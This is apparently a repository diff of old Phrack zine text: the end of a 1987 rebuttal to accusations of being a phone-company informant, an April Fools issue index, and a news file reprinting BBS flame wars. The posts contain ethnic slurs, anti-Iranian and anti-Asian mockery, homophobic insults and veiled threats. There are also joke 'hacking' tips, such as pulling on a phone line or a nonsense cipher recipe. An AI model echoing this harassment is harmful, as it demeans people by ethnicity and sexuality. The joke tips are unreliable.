almost (again I stress almost) understand why he was suspicious. This msg also
|
||||
points out that at least in his msgs to me he was of the opinion that I had
|
||||
infiltrated the conference (not that his opinion about anything matters).
|
||||
Then, on a social ladder climbing binge, he turns it around to me being one of
|
||||
them (as if he was the only person in the world who could infiltrate
|
||||
something). To this I say again, I was doing this when you were still in
|
||||
diapers (SR). Even though I can legitimately understand why he would think I
|
||||
was a fed as this at least "APPEARS" to be proof that I'm a fed, by that I
|
||||
mean if I had broken into a telco security computer and found a msg saying
|
||||
that so and so was running a sting board, I would be prone to believe it
|
||||
myself. What Sally didn't know was that I had to say that at that conference
|
||||
to keep from being fried myself when confronted by a security agent who
|
||||
recognized me. But then what are the odds of someone breaking into the very
|
||||
computer reading that very msg. If it were me and I was going to take this
|
||||
information to the phreak community I would have to state the facts, which
|
||||
were that he found this msg, "then print msg". I would not go into the
|
||||
guessing that he and KL did in the original Phrack article (or this last one,
|
||||
since the first obviously wasn't enough). But back to the point of all of
|
||||
this, "WHAT WOULD YOU SAY STANDING IN THE MIDDLE OF 500 TOP TELCO SECURITY
|
||||
PEOPLE AND ONE WALKS UP AND SAYS, "AREN'T YOU SO AND SO THAT RUNS SO AND SO
|
||||
BBS?" See what I meant about a comedy of errors? Do you also see why
|
||||
sometimes what is apparently the truth isn't always what it appears as. Do you
|
||||
also see what I mean about gossip and poor journalism? This is not the first
|
||||
time that Sally or KL has tried to distort facts and interfere with people's
|
||||
lives. I am referring to the past David Lightman incident. Instead of
|
||||
belaboring this point, I shall, in the fashion of the great journalists (KL &
|
||||
SR), reprint another msg from Sally regarding this other incident in order to
|
||||
show what kind of individual we are dealing with (a 19 yr old who if he spent
|
||||
as much time hacking and phreaking as he does stretching the facts and butting
|
||||
into peoples lives might be a good phreak/hack).
|
||||
|
||||
From: Sally Ride
|
||||
|
||||
Well a couple of things..first about Phrack World News..the above mentioned
|
||||
article about Blade Runner and David Lightman was credited to David Lightman
|
||||
and Blade Runner and someone else, maybe K.L. I really don't know either David
|
||||
or Blade that well, but when someone is accused of being a cop, or a phone
|
||||
cop, or whatever, I see no reason to keep that a secret from the phreak-world.
|
||||
Everyone is able to make their own conclusions based on the information
|
||||
provided and considering the sources. Finally, and I hope this ends all
|
||||
discussion about this on the "Elite" section of this BBS. Is that what is
|
||||
allowed for discussion here? Really, character assassination should be kept to
|
||||
the War Room of some other K-Rad luzer BBS. Secondly, thanks to all who kept
|
||||
me up to date on the status of the BBSes that had suddenly dropped out of
|
||||
sight all for separate unrelated reasons. I found The Twilight Zone, now the
|
||||
Septic Tank, it's back at 203-572-0015, old accounts intact. Taran King's
|
||||
Metal Shop Private should be back up within hours of this message, see PWN 6
|
||||
for the details. And Stronghold East is still down as far as I know, should be
|
||||
back around 7/1. Broadway's always been weird but turning informant? Will
|
||||
wonders never cease? And, TUC has a board again? And, here I thought he was a
|
||||
"Security Consultant", per W.57th St. Who knows who's side who is on? Scan
|
||||
Man, here's news from your neck of the woods. A company named Advanced
|
||||
Information Management Inc. run by Robert Campbell. The June 23rd issue of
|
||||
Communications Week says this guy and his 17 consultants are all over the BBS
|
||||
world. They are based in Woodbridge, VA. Know anything about them? Sound like
|
||||
some more narcs to worry about. What is the true story on Ralph Meola? PWN 6
|
||||
says he's the head of AT&T Security. Has anyone ever heard of him before?
|
||||
Sally Ride:::Space Cadet
|
||||
|
||||
I believe your words were, "character assassinations should be kept on some
|
||||
k-rad Luzer war board" (try taking some of your own advice, or is it different
|
||||
when it's your friend). You also made the statement that everyone should be
|
||||
able to make their own decisions based on the sources. In my case it's two
|
||||
guys that don't know me or really anything about me (KL & SR). Did anyone also
|
||||
notice Sally's tendency toward a persecution complex? Everyone he mentioned in
|
||||
the msg is thought to be a phone cop. I mean, really, take a good look at that
|
||||
msg. It's quite obvious this boy is playing God and deciding who is and isn't
|
||||
on who's side (you're not the only one who saves msgs). He's either attacked
|
||||
or defended (mostly attacked or insinuated) about 5 people in one msg of being
|
||||
the bad ole phone cop. Who set you two up as judge and jury? As to how I feel
|
||||
about it, I'll use an old saying with a new twist, "If you want to hear the
|
||||
jukebox, you damn well better have a quarter," better known as "pay the
|
||||
piper". Does it sound like I'm upset? I mean how would you feel if you had
|
||||
trouble keeping your family fed, heated, and housed because some asshole that
|
||||
just hit puberty stuck their nose into your life. Tell your son, no he can't
|
||||
go skating because you don't have the money because........etc.....Also I
|
||||
might add that a number of us old guards who were phreaking before there were
|
||||
computers and BBSes such as my old friend, Joe Engressia (Secrets of Little
|
||||
Blue Box, Esquire 71) (avail P-80) and others have done actual security work
|
||||
(not busting heads) defeating security systems on new payphones (test before
|
||||
marketing) etc for yrs. I don't see anyone jumping up and yelling phone cop on
|
||||
these guys. People who are admitted security people who also claim to be
|
||||
phreaks are ignored. So why all the stink with me? In closing I would like to
|
||||
say that I have little doubt that in their usual fashion KL and/or SR will
|
||||
attempt to go over every word I have typed looking for more SO CALLED FACTS.
|
||||
Any way you try to reword it will only be more twisting and supposition. Sooo
|
||||
be my guest. You will get no more comments from me. The next time either of
|
||||
you two hear from me, you better have your Quarter for the jukebox cause it
|
||||
will be time to pay the piper.
|
||||
|
||||
P.S. KL do me a favor and call my board and let me know whether you will be at
|
||||
this phreak conf in St Louis. If so I recommend old cloths, and clean
|
||||
underwear.
|
||||
|
||||
|
||||
(Oh yes and a quarter.)
|
||||
|
||||
Scan Man (3-10-87)
|
40
phrack13/1.txt
Normal file
40
phrack13/1.txt
Normal file
|
@ -0,0 +1,40 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 13, Phile #1 of 10
|
||||
|
||||
Index...
|
||||
~~~~~~~~
|
||||
|
||||
Well, as a tribute to April Fools Day (4/1/87) and as a break to the
|
||||
normal grinding speed of Phrack Inc. (HA!), we at Phrack Inc. have taken a
|
||||
break to be stupid, to get our frustrations out, to make fun of people,
|
||||
places, and things, and to be just generally obnoxious.
|
||||
|
||||
This issue was delayed due to THE EXECUTIONER who may be blamed for
|
||||
the slow date release of this issue. We currently believe him to be trekking
|
||||
back to his home in the Himalayas to hide with his mom (Saskwatch). Heh...
|
||||
Just getting you in the mood for what's ahead.
|
||||
|
||||
This issue is NOT to be taken seriously in any manner (except
|
||||
anything mentioned about Oryan Quest) and is put together extremely loosely.
|
||||
None of the files have been formatted. None of the files have been spell-
|
||||
checked. Don't expect quality from this issue...just have fun. Later.
|
||||
|
||||
Taran King
|
||||
Sysop of Metal Shop Private
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
Table of Contents:
|
||||
|
||||
#1 Phrack XIII Index by Taran King (2.0K)
|
||||
#2 Real Phreaker's Guide Vol. 2 by Taran King and Knight Lightning (5.2K)
|
||||
#3 How to Fuck Up the World - A Parody by Thomas Covenant (9.5K)
|
||||
#4 How to Build a Paisley Box by Thomas Covenant and Double Helix (4.5K)
|
||||
#5 Phreaks In Verse by Sir Francis Drake (3.1K)
|
||||
#6 R.A.G. - Rodents Are Gay by Evil Jay (5.8K)
|
||||
#7 Are You A Phone Geek? by Doom Prophet (8.8K)
|
||||
#8 Computerists Underground News Tabloid - CUNT by Crimson Death (10.5K)
|
||||
#9 RAGS - The Best of Sexy Exy (19.2K)
|
||||
#10 Phrack World News XIII by Knight Lightning (26.0 K)
|
||||
------------------------------------------------------------------------------
|
579
phrack13/10.txt
Normal file
579
phrack13/10.txt
Normal file
|
@ -0,0 +1,579 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 13, Phile #10 of 10
|
||||
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
PWN PWN
|
||||
PWN *>=-{ Phrack World News }-=<* PWN
|
||||
PWN ~~~~~~ ~~~~~ ~~~~ PWN
|
||||
PWN Issue XIII PWN
|
||||
PWN PWN
|
||||
PWN Created, Written, and Edited PWN
|
||||
PWN by Knight Lightning PWN
|
||||
PWN PWN
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
|
||||
Happy April Fool's Day and welcome to Issue Thirteen of Phrack World News. In
|
||||
the spirit of April Fool's Day, this is the "rag" issue of PWN. And now we
|
||||
take a look back and enjoy the most hilarious posts of the past year. These
|
||||
posts were selected only because they were there and no one should take offense
|
||||
at the material. Please note that not all posts are rags, which only goes to
|
||||
prove that you don't have to rag to be funny.
|
||||
|
||||
[Some posts have been reformatted and edited for this presentation].
|
||||
|
||||
[Special thanks to Solid State]
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
Name: The Executioner #47
|
||||
Date: 2:33 pm Fri Sep 12, 1986
|
||||
|
||||
Slave Driver > Do explain that message... I do NOT kiss anyone's ass except my
|
||||
own because I am such an awesome studly dude. Something you would know nothing
|
||||
about, being studly that is.
|
||||
|
||||
Master Vax, you are an utter bore who has nothing contributing to say. You are
|
||||
so useless. When people say "Sexy-Exy", they say "Ragger Elite, good knowledge
|
||||
and not too bad of a cosysop." When people say Circuit Breaker, they say
|
||||
"who?????" . Face it, you are basically non-existent in the modem world. You
|
||||
command nothing and you hang out with the lowest echelon like Dr. Doom who sat
|
||||
there for about 10 minutes taking my abuse, making lame comments thinking he
|
||||
was cool.
|
||||
|
||||
Anyway, this is a phreak/hack sub, not some rag board where I am allowed to
|
||||
bug the hel out of you. And when it comes right down to it, I don't brag about
|
||||
my knowledge, because "Those who proclaim their knowledge, proclaim their
|
||||
ignorance".
|
||||
|
||||
-The Sexyest Executioner
|
||||
|
||||
|
||||
Name: Dr. Doom #106
|
||||
Date: 6:04 pm Fri Sep 12, 1986
|
||||
|
||||
Executioner...
|
||||
Well, it seems that a little more than a week ago, it was 'Dr. Doom, we (PLP)
|
||||
feel that you would be a valuable addition to our group and therefore are
|
||||
extending an invitation to join the Phone Line Phantoms.' and then I told you
|
||||
quite simply that I wasn't interested in joining PLR (Phone Line Raggers). NOW,
|
||||
you are calling me voice just to rag on me and posting 'Dr. Doom the loser...'.
|
||||
So, the other week you were kissing ass 'Dr. Doom join PLP....' , etc... and
|
||||
now quite suddenly I have become a loser because I didn't join PLR.
|
||||
|
||||
Guy, I could in a few minutes come up with LOADS of stuph to say about you, but
|
||||
since you carry no weight and are on some kind of an ego-trip I will let you go
|
||||
off to Central Park and play Ninja with Broadway.
|
||||
|
||||
Dr. Doom
|
||||
|
||||
|
||||
Name: Knight Lightning #2
|
||||
Date: 12:49 am Sat Sep 13, 1986
|
||||
|
||||
This is getdhng good, its been a while since we saw a really heated battle on
|
||||
here and you know why? Because those who start heated battles on this board
|
||||
get deleted so either post good info or use the email or you won't be using
|
||||
the system for anything any longer. In other words lets drop the bullshit
|
||||
messages (like this one) use use this sub for what it was intended.
|
||||
|
||||
:Knight Lightning
|
||||
|
||||
|
||||
Name: The Executioner #47
|
||||
Date: 9:45 am Sat Sep 13, 1986
|
||||
|
||||
By the way, Dr. Doom, we thought you had some knowledge (at least TEL did).
|
||||
When I read all 31+ files you wrote, which happened to come straight out of
|
||||
manuals, I was not impressed. I am not ragging on you because you didn't join,
|
||||
I am pointing out a harsh reality that you should face.
|
||||
|
||||
You are a peon compared to the monolithic stature of one such as I.
|
||||
You are an amoeba compared to the complex genius person I am.
|
||||
You are a pimple compared to the sexyness and looks such as I.
|
||||
You are a clinging form of pig feces.
|
||||
|
||||
You throw absolutely NO weight around. No one cares about you or your bbs.
|
||||
having absolutely no reputation, you proceed to write 31 files because you cry
|
||||
at home fearing that no one likes you. And, I have composed a neat little tune
|
||||
about you to the Beverly Hillbillies (Your ancestors)
|
||||
|
||||
Now listen to a story about a boy named Doom,
|
||||
Poor Modem geek who would never leave his room.
|
||||
Then one day he was talking on the phone,
|
||||
When up in his pants came a miniature bone.
|
||||
Penis that is, kind of like a toothpick.
|
||||
Well the next thing you know old Doom has a board,
|
||||
Running on a commie cuz it's all he can afford.
|
||||
So now doom sits at home as happy as can be,
|
||||
thinking he's cool he turns down PLP.
|
||||
So now he thinks he happnin he thinks he's rad,
|
||||
With his high pitched voice, god this boy is sad.
|
||||
And this is the story about a dork named Doom,
|
||||
Poor modem geek who DOESN'T want to leave his room.
|
||||
Why?
|
||||
Because your UGLY! D-O-O-M! (<-that was to Mickey Mouse)
|
||||
|
||||
The End.
|
||||
|
||||
The Executioner/PhoneLine Phantoms!
|
||||
Name: Carrier Culprit #11
|
||||
Date: 10:17 am Sat Sep 13, 1986
|
||||
|
||||
Heh. That was pretty cool. Doom you have no talent what so ever, I could pick
|
||||
up a manual and start typing away. When data demon and I were talking to you
|
||||
via 3 way you couldn't even answer some basic CCIS stuff. And Lover was the
|
||||
only person who wanted you in the group, I hope he wasn't impressed by your
|
||||
files (volume I, II, III, IV, V, etc.. heh). And if you think that all PLP
|
||||
does is rag, well you must not know what's up in the world. And make up your
|
||||
mind, you keep changing your group's name and bragging about turning down an
|
||||
offer to be in PLP. Well, Doom my boy you told me your were going to drop
|
||||
Metro Communications to join PLP until you saw Exy's rag on your so called
|
||||
Commie 5 messages per sub board. Shit your board was up longer than Link, and
|
||||
Link blows it away. Well, I really should stop this ragging because it's
|
||||
pretty uncool, then again Doom is uncool. Anyway your group is gay in the
|
||||
face!
|
||||
|
||||
--Culprit
|
||||
MCI Communications
|
||||
Sprint COM
|
||||
950 Communications
|
||||
I dunno Communications
|
||||
Metro MEN!
|
||||
|
||||
|
||||
Name: Dr. Doom #106
|
||||
Date: 10:04 pm Sat Sep 13, 1986
|
||||
|
||||
Well, as some of you might have seen lately, certain people do not relish the
|
||||
fact that I thought very little of them so they are attempting to slander my
|
||||
good name by saying that I know nothing and that every file I have ever written
|
||||
was copied from manuals. First of all, most files I have written do contain
|
||||
some information that was origionally printed on some Bell or AT&T document,
|
||||
because they relate to such things as ISDN, but by NO means are they copied
|
||||
from manuals in any way.
|
||||
|
||||
Mikie, that was a rather amusing song, but in no way did anything in it come
|
||||
close to possibly reflecting me. I mean it is nice that you want to tell
|
||||
everybody about your life and all, but you really should not try to
|
||||
self-project your tragedies on someone else. If you need help trying to come
|
||||
up with some auto-biographical titles about yourself, you should try :
|
||||
|
||||
'The Life and Times of a PLP Loser Named Mikie Chow Ding Dong Dung.'
|
||||
|
||||
Oh, did you call me UGLY? that is quite far from the truth. Look at you,
|
||||
someone who as a child could use dental floss as a blindfold. calling me UGLY?
|
||||
Humor me more Mr. 'UGLY' Chinaman who writes files on 'Beauty Techniques'.
|
||||
Face it, some people are just born naturally handsome and don't need make up to
|
||||
disquise their grotesque features like you do.
|
||||
|
||||
Since you think you are SO tough, you are cordially invited to come down here
|
||||
to Texas where talk is cheap and doesn't mean shit. (Don't forget to bring
|
||||
your throwing star collection....'
|
||||
|
||||
Dr. Doom
|
||||
|
||||
|
||||
Name: The Executioner #47
|
||||
Date: 10:18 am Sun Sep 14, 1986
|
||||
|
||||
Doom, Spare me your lame tongue flapping and breath exhultation that only makes
|
||||
you look like the fuckoid you are. People have met me, people know that what I
|
||||
say is all backed up and all true. Who has met you? No one has met you so you
|
||||
can fling all the bullshit you want. When I say I am gorgeous, the people who
|
||||
have met me can always say, "I've met you and you are a dork". But do they?
|
||||
No, because I am not a dork unlike yourself.
|
||||
|
||||
I don't know where you get the idea that I am some karate dude, because I am
|
||||
not, and don't even care to be. Unless you are stereotyping all of us
|
||||
orientals like that, showing that you are in an ignorant chunk of muleflesh.
|
||||
And I could stereotype you, the polish, born of blue collar trash collectors.
|
||||
I am sure you go bowling and have bowling trophies mounted in glass cases in
|
||||
your cardboard house. How is that dirt floor? How is the bearskin door? I
|
||||
know you are of low social stature and therefore do not know or even comprehend
|
||||
the social elegance that I am born and bred in. So you can just take you and
|
||||
your $20000 income that your family makes and just save it for someone who is
|
||||
at your level.
|
||||
|
||||
Is it true that the welfare lines are long?
|
||||
How was the goverment cheese giveaway?
|
||||
|
||||
The Sexyest Executioner
|
||||
|
||||
|
||||
Name: >UNKNOWN<
|
||||
Date: <-> INACTIVE <->
|
||||
|
||||
As someone else already said: Please spare the rest of us users the pain of
|
||||
having to hit the space bar whenever the author of the message is 'Dr. Doom'
|
||||
or 'The Executioner', or whatever. Geez...
|
||||
|
||||
If all goes well, there'll be a K-K00L Ragging Subboard, and you people can
|
||||
just go there and tell the other person how k-radical you are, what a stud,
|
||||
how good looking, and what an asshole, loozer, rodent the other person is. I
|
||||
think most of the other users, along with myself, are getting quite sick of
|
||||
all of this...After all: This *IS* the Phrack/Gossip board, right? Yeah...
|
||||
|
||||
[%] The Yakuza [%]
|
||||
|
||||
|
||||
Name: >UNKNOWN<
|
||||
Date: <-> INACTIVE <->
|
||||
|
||||
What the HELL does your looks have to do with this, Exy? It doesn't matter how
|
||||
'great' looking you are, because the board wasn't put up so you could tell us
|
||||
how much of a ladies man you are. If you want to brag, put up your own board.
|
||||
And since your messages are directed to one person, USE THE FUCKING EMAIL
|
||||
COMMAND! thats what its there for.
|
||||
|
||||
Some people..
|
||||
|
||||
|
||||
|
||||
|
||||
Name: The Executioner #47
|
||||
Date: 10:31 am Sun Sep 14, 1986
|
||||
|
||||
Ass kissing? Please, spare me the vomit of your mouth huh bud? Taran says
|
||||
something about ISDN and since I knew something about what he said, I decided
|
||||
to expand it into an explanation which is definately not ass kissing. I don't
|
||||
kiss anyone's ass because I dont have to. Taran does not delete me out of
|
||||
mutual respect I have for him and I should think he has for me. Notice I don't
|
||||
use low-level words like "fuck" and "shit" and all the other terms that people
|
||||
with IQ's of a marble statue have. So Dr. Doom is a good friend of yours huh?
|
||||
Probably your ONLY friend because both of you look like the Elephant Man....
|
||||
"I'm Noooooooot an ANIMAL!!!", don't worry Doc, Paper bags are still in.
|
||||
|
||||
As for files, I have written my share, and really could care less whether or
|
||||
not you can read or not. As for the PhoneLine Phantoms, we are not just a
|
||||
telecom group, we are comprised of the 4 best looking, studliest people. When
|
||||
I heard about Doom, I said, well, I dunno, we will have to reduce our image of
|
||||
4 studs into 4 studs and 1 dud. As for playing with my male organ, you must
|
||||
know more than I, considering you know all these nifty little sayings you must
|
||||
have thought up when you were raping that coke bottle. As for calling Doom, I
|
||||
call when I get a deep feeling of pity abnd decide to enlighten the poor
|
||||
impoverished boy.
|
||||
|
||||
So, why don't you, Doom, Master Vax (Circuit Breaker) go and slither back into
|
||||
your holes where you can fester and leave the REAL stuff to me and Culprit.
|
||||
|
||||
And if you really wanna take this issue far, I propose a challenge. I will
|
||||
send my picture to an unbiased third party and you do the same. Then we will
|
||||
see who is the REAL Sexy-Exy. Oh yeah, it's Mikey, not Mikie, and Exy, not
|
||||
Exie, and I prefer a "Mr. Executioner, sir" before you speak to me. I will just
|
||||
call you little peon...
|
||||
|
||||
-The Executioner
|
||||
PhemalesLuv Phantoms!
|
||||
|
||||
PS: People who belong to something cool can post it, those who can't, don't.
|
||||
|
||||
Name: Taran King #1
|
||||
Date: 11:00 am Sun Sep 14, 1986
|
||||
|
||||
PLP vs. Everyone has to stop, guys...at least on the phreak board. This is
|
||||
for telecommunications only. If you really want, I can create a rag subboard
|
||||
so you can bitch all you want, but it's getting a bit tedious out here. Exy,
|
||||
I know you have quite a bit of knowledge hidden somewhere in your mind, I've
|
||||
seen your philes, and they're decent. Dr. Doom, I know you pretty well, and I
|
||||
thought the two philes I read were quite decent as well.
|
||||
|
||||
How about a bit of unity in the crumbling phreak world that we know today, huh?
|
||||
It's already in shambles and people are getting totally bored of it, or are
|
||||
being busted. Most of us on here have been around for at very least 6 months
|
||||
so that says something about us...I know Exy wouldn't mind a rag board, because
|
||||
he excells in it, but I'll leave the final decision to the users. Go V:ote
|
||||
now, please, and stop posting rags...MORE INFO!!!
|
||||
|
||||
-TK
|
||||
GETTING PISSED!
|
||||
|
||||
|
||||
Name: Dr. Doom #106
|
||||
Date: 5:48 pm Sun Sep 14, 1986
|
||||
|
||||
Well, I am going to change the discussion because I am quite (yawn...) tired
|
||||
of this useless ragging. (By the way I drive a sports car, live in an
|
||||
affluent neighborhood, and am not Polish but of English decent). OK, like I
|
||||
was saying I am going to try to put a little life back into the Phreak World
|
||||
with a new Electronic Journal. The Dr. Doom Journal of Telecommunications as
|
||||
I call it will center around topics and techniques that have not been readily
|
||||
discussed. Although I will be doing a lot of writing (because I like to), I am
|
||||
looking for anyone else that might be interested in helping out. One of the
|
||||
Departments will be like a mini-catalog of places where you can order all
|
||||
sorts of cool stuph from that has to do with Telecom, etc... If you are
|
||||
interested or even have some places to order things from, send me mail.
|
||||
|
||||
Later...
|
||||
Dr. Doom
|
||||
|
||||
|
||||
Name: Doc Holiday #19
|
||||
Date: 11:59 pm Sat Sep 13, 1986
|
||||
|
||||
Well, since I have been away, I have noticed a few changes, but some things
|
||||
will never change I guess. Executioner is the same fag he's always been. Big
|
||||
deal, he has expanded his ragging capabilities all the way to Texas with
|
||||
Dr. Doom, who happens to be a good friend of mine. I have one question for
|
||||
you Mike, do you do anything else besides vegetate in front of your monitor
|
||||
and write songs about people? You seemed to have a very good knowledge of the
|
||||
content of the "Hillbillies" song. I guess that shows your level of intellect.
|
||||
|
||||
I really dislike ragging so this is probably the only post that will deal with
|
||||
it. If you have something to say to me, call me, if you can get my number I
|
||||
will be more than happy to toy around with you. You are shit. That is what I
|
||||
get out of all of this. You rag on Dr. Doom's files but, have you ever written
|
||||
a file with useful information in it? I seriously doubt it. Some of Doom's
|
||||
files are so-so because I already know a lot of it, but many of his articles
|
||||
are actually quite informative. Have you even read any of them?
|
||||
|
||||
Also, why is it that you call him quite often every day? Have you ever left
|
||||
your house or anything besides to ride the little school bus to get to school?
|
||||
That is very doubtful also. Taran, why don't you just get rid of this nusance?
|
||||
Is he some sort of threat to you? Anyway, Exie, about your brown-nosing, I see
|
||||
all of these rag posts of yours, then Taran posts something on ISDN and then
|
||||
you immediately post something on the topic, afterwhich you go back to ragging.
|
||||
If that isn't ass-kissing then explain to me what is.
|
||||
|
||||
What about PLP, why do you even bother to exist? I am speaking mainly to
|
||||
Carrier Culprit and The Executioner. I remember being on three-way with CC
|
||||
and someone else whom I won't name, and listening to him say things about me.
|
||||
I have never even talked to the person before. Then when I got on the line and
|
||||
talked with him, he didn't know anything. I would ask about general telecom
|
||||
topics and he would say "I'm sorry, I don't know much about the phone network,
|
||||
I hack mostly", then I would ask something about hacking and he
|
||||
co-oincidentally couldn't remember his way around those systems very well
|
||||
because they weren't that important. Did someone mention DEC? They are a
|
||||
really nice company. I am involved with them quite often. I even use a DEC
|
||||
terminal to call places instead of a computer. The Executioner probably thinks
|
||||
a DEC is something you play with every night before you go }to bed, because of
|
||||
his personal experiences. He is a DEC (w)hacker, but anyways, I think I have
|
||||
made my point.
|
||||
|
||||
Doc Holiday
|
||||
|
||||
PS: Notice no fancy shit under name...sorry, but I don't take ego trips during
|
||||
the off season.
|
||||
|
||||
Name: The Executioner
|
||||
Date: 2:57 pm Tue Sep 23, 1986
|
||||
|
||||
^ ^
|
||||
/ + \ / + \
|
||||
/*TBC*\ /*TBC*\
|
||||
|=====|__________________________________|=====|
|
||||
| | | |
|
||||
||||||| The Executioner & Egyptian Lover |||||||
|
||||
|-----| -------------------------------- |-----|
|
||||
| Rag | | The Breakfast Club | | Rag |
|
||||
|Files| -------------------------------- |Files|
|
||||
################################################
|
||||
% %
|
||||
% Presenting: Rag Volume Four %
|
||||
% ---------------------------- %
|
||||
%%%%%%%%%%%| /\/\/\/\/\/\/\/\/\/\/\/\ |%%%%%%%%%
|
||||
| Arthur Dent: Third World Iranian |
|
||||
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
|
||||
|
||||
There's this kid called Arthur Dent,
|
||||
He's got no money, not one red cent.
|
||||
Cool and Slick is what he wants to be,
|
||||
He even wants to be a part of LOD!
|
||||
His mother country, he calls Iran,
|
||||
He cleans camel stalls like no one can.
|
||||
All he wants, is to hang around with phreaks,
|
||||
But there's a law against third world geeks.
|
||||
It says: "Get out of my country, get outta my land,
|
||||
Go back to your people who make houses out of sand."
|
||||
Pack your bags and be on your way,
|
||||
We don't want you 'cuz you're all gay.
|
||||
You think you're cool 'cuz you can hack,
|
||||
I hate to tell you this, but bud you're wack.
|
||||
I saw your picture and boy are you lame,
|
||||
From under a rock is where I think you came.
|
||||
You cry "Hey Phucked agent, please teach me!"
|
||||
You annoy the poor man, don't you see?
|
||||
You try to impress everyone in sight,
|
||||
One look at you and we run in fright.
|
||||
Ain't it funny how your temper does fume,
|
||||
When I say I'm in the Legion of Doom.
|
||||
With a cardiac arrest, you get all hyper,
|
||||
In case you piss in your pants, here's a diaper.
|
||||
Now, don't get mad from this little ol' rag,
|
||||
Just cover your face with a grocery bag.
|
||||
With a towel on your head you do declare,
|
||||
"Allah gimme a real life and real hair."
|
||||
Well, my iranian friend, I am done,
|
||||
I hope you don't mind me having some fun.
|
||||
=============================================================
|
||||
The above is a rag I wrote a while back, I got alot of good feedback from it so
|
||||
I'd thought I'd have an encore presentation.
|
||||
|
||||
The Executioner
|
||||
|
||||
|
||||
Name: The Executioner
|
||||
Date: 4:53 pm Sun Oct 12, 1986
|
||||
|
||||
Anyway, as to Quest, that little nuisance thinks he has a real bbs and he
|
||||
thinks just because I let him talk to me for 5 minutes he's my best friend.
|
||||
Frankly, I'd axe him just because he shows no sign of any capable action short
|
||||
of maybe masturbating his dog into a bowl of frozen tofu.
|
||||
|
||||
Ciao
|
||||
|
||||
Sexy
|
||||
|
||||
|
||||
Name: Arthur Dent
|
||||
Date: 11:06 pm Mon Oct 13, 1986
|
||||
|
||||
You mean PINK tofu, I think. Read read the last message if you haven't the
|
||||
slightest
|
||||
|
||||
dent
|
||||
|
||||
|
||||
Name: Knight Lightning
|
||||
Date: 10:46 pm Sun Nov 23, 1986
|
||||
|
||||
PLP Three-Way Con:
|
||||
|
||||
Rich: Hey Mike the board is going great!
|
||||
Mike: Thats good, any new users today?
|
||||
Rich: A few, I haven't validated them yet...
|
||||
Eric: Ho hum...
|
||||
Mike: Lets call some now and check them out.
|
||||
Rich: Ok, hold on...
|
||||
Eric: No Rich wait wait...
|
||||
Rich: I'm going to click over to three way.
|
||||
Eric: NO! Wait wait Rich hold on.
|
||||
Rich: I'm Going toCLICK on my three way hold on!
|
||||
Mike: Whats your problem Eric?
|
||||
Eric: Wait Rich, will you just wait a minute!
|
||||
Rich: Ok!? What!?
|
||||
Eric: Rich, (pause) You're gey!
|
||||
Mike: Eric, you are the Wack!
|
||||
Eric: Shut up Mike!
|
||||
Mike: What? Hello, hello did you say something? Hello hello?
|
||||
Eric: Dag!
|
||||
|
||||
:Knight Lightning
|
||||
|
||||
|
||||
From: SHERLOCK HOLMES
|
||||
Date: MON FEB 16 9:04:17 PM
|
||||
|
||||
On a recent visit to The Iron Curtain, (I think that was the one).. well it was
|
||||
my first time on and they were talking about stuph like newsletters and things
|
||||
like that.. one post said something like this:
|
||||
|
||||
"Okay... I know you guys have heard of TAP and 2600, well there is a new
|
||||
phreak/hack newsletter. It's called Phrack [Please note that by this time
|
||||
Phrack X was already well underway and being distributed] try and get a file in
|
||||
it. Phrack is all these files. It looks really good. I would try to get a
|
||||
file in there to impress your friends."
|
||||
|
||||
Sherlock
|
||||
|
||||
|
||||
From: DOOM PROPHET
|
||||
Date: MON FEB 16 9:56:08 PM
|
||||
|
||||
I think common sense should be used by the authors and editors of newsletters
|
||||
that get around, that is, not to overplay or exaggerate anything concerning
|
||||
someone's feats, or knowingly print invalid information while keeping the real
|
||||
information for themselves. Of course, if the whole newsletter writing
|
||||
population (of which I am a part) started churning out idiotic files about
|
||||
idiotic things, then maybe the security people and rich business pigs would
|
||||
dismiss us as dumb kids.
|
||||
|
||||
Example:
|
||||
!@#$%^&*()_+!@#$%^&*()_!@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()+_!$#!
|
||||
|
||||
|
||||
|
||||
HOW TO DISCONNECT SOMEONE'S LINE
|
||||
|
||||
By KODE KID 100
|
||||
|
||||
0k d00dz, just g0 t0 the f0ne line where it cumes out of the house and pull on
|
||||
it as hard as you can. Then, the loze has his line disconnected until AT&T
|
||||
Repair service soldiers come to fix it.
|
||||
|
||||
L8r111
|
||||
|
||||
K0DE KID 1OO
|
||||
-The Marauders
|
||||
|
||||
PS: Call Digit/\|_ ITS *ELITE*,tonz of k0dez 4 *REAL* hackers!
|
||||
|
||||
!$#@!!$^%$#&^%*^&(*^(&)(*___++((*_)&+(%^$%^#%$%$@%#$#%^#^%&#$^%&&%?<<?$&@#$%!@!
|
||||
|
||||
|
||||
78/81: A New Mod..
|
||||
From: THE LINEMAN
|
||||
Date: MON MAR 09 2:05:25 AM
|
||||
|
||||
I have an idea for a mod that will save the users a hell of a lot of time.
|
||||
Howabout put an IF THEN statement when you are saving the message so that if
|
||||
the name is "ORYAN QUEST" then it won't save then we won't get rodenty G-File
|
||||
posts anymore. Sound good?
|
||||
|
||||
ciao
|
||||
The Lineman
|
||||
|
||||
|
||||
77/77: TMC...
|
||||
From: MARK TABAS
|
||||
Date: SAT MAR 14 12:05:38 AM
|
||||
|
||||
I heard that if you crank a TMC code through the DES algorithm, and then
|
||||
through the Cristensen CRC-16 algorithm, followed by complementing its
|
||||
packed binary value and then encrypt it to "kl.LLL.hyuuuu" using the German
|
||||
enigma, you'll get a COSMOS dialup!
|
||||
|
||||
Does anyone know if this works??????
|
||||
|
||||
tabas
|
||||
_______________________________________________________________________________
|
||||
|
||||
Well thats it, but before we go, here is a quick look at the vote section of
|
||||
Metal Shop Private:
|
||||
|
||||
Question #3: Should Oryan Quest be let back on?
|
||||
Users voting: 8.7%
|
||||
|
||||
0:No Comment
|
||||
1:No. : 3 50.0%
|
||||
2:No. : 1 16.7%
|
||||
3:No. : 0 0.0%
|
||||
4:No. : 1 16.7%
|
||||
5:No. : 0 0.0%
|
